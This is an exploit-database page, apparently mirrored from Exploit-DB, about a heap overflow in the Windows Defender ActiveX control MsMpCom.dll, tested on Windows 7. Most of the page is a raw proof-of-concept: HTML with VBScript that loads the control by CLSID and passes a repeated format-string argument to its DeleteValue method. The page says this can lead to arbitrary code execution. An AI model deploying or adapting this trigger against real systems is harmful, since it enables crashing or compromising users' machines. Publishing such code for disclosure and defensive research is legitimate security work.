header-logo
Suggest Exploit
vendor:
Windows Defender
by:
Anonymous
7,8
CVSS
HIGH
Heap Overflow
122
CWE
Product Name: Windows Defender
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2020

Microsoft Windows Defender ActiveX Heap Overflow PoC

This exploit is a proof-of-concept (PoC) code for a heap overflow vulnerability in Microsoft Windows Defender ActiveX. The vulnerability is triggered when a maliciously crafted argument is passed to the DeleteValue method of the MsMpCom.dll library. This can lead to arbitrary code execution.

Mitigation:

Microsoft has released a security update to address this vulnerability. Users should apply the update as soon as possible.
Source

Exploit-DB raw data:

#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC]
#tested on :[windows 7]
#Microsoft Windows Defender

<html>
<object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Windows Defender\MsMpCom.dll"
prototype  = "Sub DeleteValue ( ByVal bstrKeyName As String ,  ByVal bstrValueName As String )"
memberName = "DeleteValue"
progid     = "MpComExportsLib.MsMpSimpleConfig"
argCount   = 2
 
arg1="defaultV"
arg2="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
 
target.DeleteValue arg1 ,arg2 
 
</script>

Navigation

Suggest Exploit

Services By CQR